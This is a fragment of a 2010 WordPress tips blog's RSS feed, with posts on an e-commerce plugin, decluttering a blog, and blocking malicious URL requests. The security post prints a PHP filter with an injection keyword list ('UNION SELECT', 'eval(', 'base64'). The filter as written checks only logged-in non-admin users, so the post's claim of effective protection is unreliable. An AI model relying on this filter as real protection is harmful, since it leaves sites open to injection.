<p><strong>100% Customizable</strong><br />
Use your own HTML &amp; CSS and have complete control over the  look and feel of your online store.</p>
<p><strong>Search Engine Friendly</strong><br />
Awesome tools are integrated to improve your online  product search rankings.</p>
<p>Head over to <a title="E-Commerce WordPress Plugin" href="http://www.getshopped.org" target="_blank">Getshopped.org</a> to learn more about this awesome plugin or you can download it here: <a title="WordPress E-Commerce" href="http://wordpress.org/extend/plugins/wp-e-commerce/" target="_blank">WP E-Commerce</a></p>
<p><span style="color: #993300;"><strong>Discussion:</strong></span> I&#8217;m currently testing all the capabilities of the plugin. So far so good. If you&#8217;ve had any experience using the WP-E-Commerce plugin, please leave us a comment to let us know what you think about it.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Build+an+E-Commerce+WordPress+Site+in+5+Minutes&amp;link=http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/&amp;notes=Here%27s%20a%20quick%20video%20tutorial%20showing%20you%20how%20to%20add%20E-Commerce%20capabilities%20to%20your%20WordPress%20blog%20through%20a%20free%20plugin%3A%20WP%20E-Commerce.%20The%20basic%20solution%20is%20very%20easy%20and%20allows%20you%20to%20add%20an%20almost%20unlimited%20amount%20of%20products%20and%20connects%20you%20with%20the%20most%20popular%20payment%20gateways.%0D%0A%0D%0AIn%20this%20v&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>10 Things that Unnecessarily Complicates Your Blog</title>
		<link>http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/</link>
		<comments>http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/#comments</comments>
		<pubDate>Sat, 24 Apr 2010 13:31:50 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[blogging tips]]></category>
		<category><![CDATA[optimization]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=686</guid>
		<description><![CDATA[This is a guest post by Tom Walker who is a blogger and designer from a specialist provider of cartridges next day and print media supplies. If you are interested in guest posting on Sam’s Web Guide, please visit our guest post guidelines page here. Failure to monitor your blog can result in the advent ...]]></description>
			<content:encoded><![CDATA[<p><em>This is a guest post by Tom Walker who is a blogger and designer from a specialist provider of <a href="http://www.cartridgesave.co.uk/">cartridges next day</a> and   print media supplies. </em><em>If you are interested in guest posting on  Sam’s Web Guide, please  visit our <a title="Guest post on Sam's Web  Guide" href="../guest-post/" target="_blank">guest  post  guidelines page here</a>.</em></p>
<p><em> </em></p>
<p>Failure to monitor your blog can result in the advent of non-standards compliant code that not only gives your blog a cluttered look, but sometimes causes your blog’s pages to load improperly or not at all. With all the modern emphasis on productivity comes an equally important emphasis on simplicity and order on the Web. A successful blog needs to be useful and visually appealing which means that to keep yours on the radar, you’re going to have to clean it up a bit. Here are some steps you can take to keep your blog simple, clean and in tip-top shape.</p>
<p><span id="more-686"></span></p>
<h3><span style="color: #333399;"><strong>1. Offload or Reduce Your Blogroll</strong></span></h3>
<p>It’s nice to list some other blogs that you and your readers might be interested in, but does it really have to be on every page? That’s up to you, but you should carefully consider moving it out of the way and planting it on its own page rather than cluttering up your sidebar.</p>
<h3><span style="color: #333399;"><strong>2. Delete the Spam Kill Count</strong></span></h3>
<p>Useless elements like Akismet’s spam counter do nothing to contribute to the mission of your blog, so why bother? Everyone knows about the Akismet plugin for WordPress and that it indeed does kill spam, but what value is the kill count to your blog. Think about taking that off your blog so users can pay attention to you instead.</p>
<h3><span style="color: #333399;"><strong>3. Remove RSS Feeds for Posts</strong></span></h3>
<p>Most people aren’t interested in an RSS feed for a post anyway: if they are, they can bookmark it. Besides, too many feeds complicate your blog, so removing all but the main one should help your blog.</p>
<h3><span style="color: #333399;"><strong>4. Ease Off the Social Bookmark Buttons</strong></span></h3>
<p>Many people find all those submission buttons for each post to be distracting, so why do some blogs have the icons and links plastered everywhere? If you want to get your posts submitted to these services, either the links or the icons should do. Be sure to discard the one you don’t want to keep. And you don&#8217;t need to list fifty options: stick to the main players, ie. Twitter, Facebook, Digg, StumbleUpon, Reddit, Delicious.</p>
<h3><span style="color: #333399;"><strong>5. Delete Your WordPress Version Number</strong></span></h3>
<p>By default, WordPress shows the world what version of the software is running your blog. First, that is not interesting to most blog readers. Another thing is that hackers can judge by the version number what vulnerabilities exist on your site, so it’s always best to keep this information off your site.</p>
<h3><span style="color: #333399;"><strong>6. Reduce the Number of Categories</strong></span></h3>
<p>Category lists can get excessively long, and they aren’t the most popular part of a blog anyway. Besides, if it is shorter more people will be likely to browse through it. Make your blog less complicated by keeping your number of categories low.</p>
<h3><span style="color: #333399;"><strong>7. Put Polls in Posts, Not in the Sidebar</strong></span></h3>
<p>It’s great to learn the opinions of your visitors, but how about writing a post and including your poll there? Polls in the sidebar give your blog a cluttered look and can distract visitors from the real you.</p>
<h3><span style="color: #333399;"><strong>8. Move Your Archives</strong></span></h3>
<p>Readers who are interested in learning more from your site will be happy to click on a separate page to navigate your archive. Your blog will look much cleaner too.</p>
<h3><span style="color: #333399;"><strong>9. Counters and Alexa Widgets Have to Go</strong></span></h3>
<p>These gizmos take up real estate on your blog, but don’t contribute anything to a positive user experience: take them off.</p>
<h3><span style="color: #333399;"><strong>10. Have a Utility Area</strong></span></h3>
<p>Consolidate site policies to your “About Me” page so people can learn about your blog all in one place. If you offer services, then create a dedicated services page too. Same goes for your contact form.</p>
<p>Now that you’ve tried these steps, your mind is probably coming up with more ways to clean up your blog. Keep working at it and soon you’ll have a clean blog that meets modern expectations. You and your readers will be pleased with the results.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=10+Things+that+Unnecessarily+Complicates+Your+Blog&amp;link=http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/&amp;notes=This%20is%20a%20guest%20post%20by%20Tom%20Walker%20who%20is%20a%20blogger%20and%20designer%20from%20a%20specialist%20provider%20of%20cartridges%20next%20day%20and%20%20%20print%20media%20supplies.%20If%20you%20are%20interested%20in%20guest%20posting%20on%20%20Sam%E2%80%99s%20Web%20Guide%2C%20please%20%20visit%20our%20guest%20%20post%20%20guidelines%20page%20here.%0D%0A%0D%0A%20%0D%0A%0D%0AFailure%20to%20monitor%20your%20blog%20can%20r&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/04/24/10-things-that-unnecessarily-complicates-your-blog/feed/</wfw:commentRss>
		<slash:comments>38</slash:comments>
		</item>
		<item>
		<title>Secure Your WordPress Blog Against Malicious URL Requests</title>
		<link>http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/</link>
		<comments>http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 22:42:19 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Security Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[SQL attack]]></category>
		<category><![CDATA[URL Request]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=644</guid>
		<description><![CDATA[As I continue the series of techniques to secure and protect your WordPress blog, today I will be showing you how to protect your WordPress installation specifically against Malicious URL Requests that inject code to exploit your theme&#8217;s files and MySQL database. If you missed my previous security articles, you may view: 5 Extreme Steps ...]]></description>
			<content:encoded><![CDATA[<p>As I continue the series of techniques to secure and protect your WordPress blog, today I will be showing you how to protect your WordPress installation specifically against Malicious URL Requests that inject code to exploit your theme&#8217;s files and MySQL database.</p>
<p>If you missed my previous security articles, you may view: <a href="http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/" target="_blank">5 Extreme Steps to Secure Your WordPress Blog</a> and <a href="http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/" target="_blank">10 Simple Steps to Secure &amp; Protect your WordPress Blog</a>.</p>
<p><span id="more-644"></span>Since last year, thousands of sites have been hit by SQL attacks where malicious code is injected into the site. This type of attack completely disables the site&#8217;s permalink structure thus making blog post URLs inactive.</p>
<h3><span style="color: #333399;">The Awesome Solution</span></h3>
<p>We all know that prevention is better than cure, so below you will find the code that will be used to secure your site and prevent the injection. If you are tech savvy, you can create a new .php file, copy and save the code below and give it the file name: block_injections.php.</p>
<p>The code:</p>
<p><code>&lt;?php<br />
/*<br />
Plugin Name: Block Bad Queries<br />
Plugin URI:  http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/<br />
Description: Protect WordPress Against Malicious URL Requests<br />
Author URI: http://perishablepress.com/<br />
Author: Perishable Press<br />
Version: 1.0<br />
*/<br />
global $user_ID; if($user_ID) {<br />
if(!current_user_can('level_10')) {<br />
if (strlen($_SERVER['REQUEST_URI']) &gt; 255 ||<br />
strpos($_SERVER['REQUEST_URI'], "eval(") ||<br />
strpos($_SERVER['REQUEST_URI'], "CONCAT") ||<br />
strpos($_SERVER['REQUEST_URI'], "UNION SELECT") ||<br />
strpos($_SERVER['REQUEST_URI'], "base64")) {<br />
@header("HTTP/1.1  414 Request-URI Too Long");<br />
@header("Status:  414 Request-URI Too Long");<br />
@header("Connection:  Close");<br />
@exit;<br />
}<br />
}<br />
} ?&gt;</code></p>
<p><strong><em>Source: <a href="http://perishablepress.com/" target="_blank">Perishable Press</a></em></strong></p>
<p>If you would prefer not to dabble in any code, you may download the plugin here: <a href="http://samswebguide.com/wp-content/uploads/2010/04/block_queries.zip">Block Bad Queries Plugin</a></p>
<p>Save the file above and upload it to your plugin directory, /wp-content/plugins/, or use the <em>Add New</em> feature in your plugin section in the WordPress dashboard. This plugin will check for excessively long request strings (greater than 255 characters) as well as the presence of base64 code in the request URI which hides the malicious code.</p>
<p>Once the plugin is activated, it will silently and effectively close any connections for this type of injection attack.</p>
<h3><span style="color: #333399;">Start Protecting Your Blog</span></h3>
<p>This type of injection attack is extremely common in unprotected WordPress installations and the malicious code is often found hidden within free WordPress themes that are downloaded from questionable websites.</p>
<p>Always remember that prevention is better than cure and your site is your valuable investment.</p>
<h3><span style="color: #993300;">Discussion</span></h3>
<p>Please share your experiences with securing your blog and the problems that you have overcome. Also, if you require further assistance with implementing the code, please don&#8217;t hesitate to ask.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
